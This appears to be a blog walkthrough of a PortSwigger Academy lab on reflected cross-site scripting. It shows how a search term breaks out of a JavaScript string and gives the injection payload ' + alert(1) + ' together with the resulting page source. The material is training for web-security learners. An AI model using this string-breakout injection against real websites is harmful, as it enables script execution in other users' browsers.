.png)
4 months ago
72 BOOK THIS SPACE FOR AD
ARTICLE ADThis is going to be the last in a series of nine, apprentice level, Cross-Site Scripting (XSS) labs from PortSwigger Web Security Academy. In this lab we are going to be revisiting Reflected XSS. Reflected XSS arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way.
Lab description: This lab contains a reflected cross-site scripting vulnerability in the search query tracking functionality where angle brackets are encoded. The reflection occurs inside a JavaScript string. To solve this lab, perform a cross-site scripting attack that breaks out of the JavaScript string and calls the alert function.
It’s a pretty straightforward lab where we are going to need to use the search bar to inject our payload. However, as the lab title indicates, we will not be able to use angle brackets (<>)within the payload. The angle brackets are encoded this time.
Access the lab and enter an alpha-numeric string in the search bar, that you know will yield 0 results, and hit enter.
Now let’s inspect what is going on with this search function. Right click where your search string is displayed on the results page. Select Inspect.
This is going to bring up your DOM-browser with your search string highlighted. In your DOM search bar, enter your search string again and hit enter. You should have three places where it shows up.
<section class="blog-header">
<h1>0 search results for 'M4rdukWasH3re'</h1>
<hr>
</section>
<script>
var searchTerms = 'M4rdukWasH3re';
document.write('<img src="/resources/images/tracker.gif?searchTerms='+encodeURIComponent(searchTerms)+'">');
</script>
<img src="/resources/images/tracker.gif?searchTerms=M4rdukWasH3re">
We are going to focus our attention on the <script>. Notice how our search string is wrapped in single quotes, try adding one single quote to the end of your search string to see what happens. Then right click where your search string is displayed on the results page. Select Inspect.
Look at our search string in the <script> now. It appears we have broken out. Now all we have to do is add our payload after the single quote.
<section class="blog-header">
<h1>0 search results for 'M4rdukWasH3re''</h1>
<hr>
</section>
<script>
var searchTerms = 'M4rdukWasH3re'';
document.write('<img src="/resources/images/tracker.gif?searchTerms='+encodeURIComponent(searchTerms)+'">');
</script>
In order to solve the lab, we need to call the alert() function. In previous labs, we had to specify javascript:alert(). This time, however, we are already in a JavaScript script, so we just need to append our alert() function to the existing script.
There is a couple of ways we can do it, I’m going to try to concatenate it to my existing string using the (+) operator:
M4rdukWasH3re' + alert(1) + 'Enter your payload into the search bar and hit enter.
Congratulations! You’ve solved another one. Keep up the good work!
Let’s look at what’s happening. Right click where your search string is displayed on the results page. Select Inspect.
Check it out. There is our payload sitting in the <script>.
<section class="blog-header">
<h1>0 search results for 'M4rdukWasH3re' + alert(1) + ''</h1>
<hr>
</section>
<script>
var searchTerms = 'M4rdukWasH3re' + alert(1) + '';
document.write('<img src="/resources/images/tracker.gif?searchTerms='+encodeURIComponent(searchTerms)+'">');
</script>
<img src="/resources/images/tracker.gif?searchTerms=M4rdukWasH3reundefined">
Bengali (Bangladesh) · 
English (United States) ·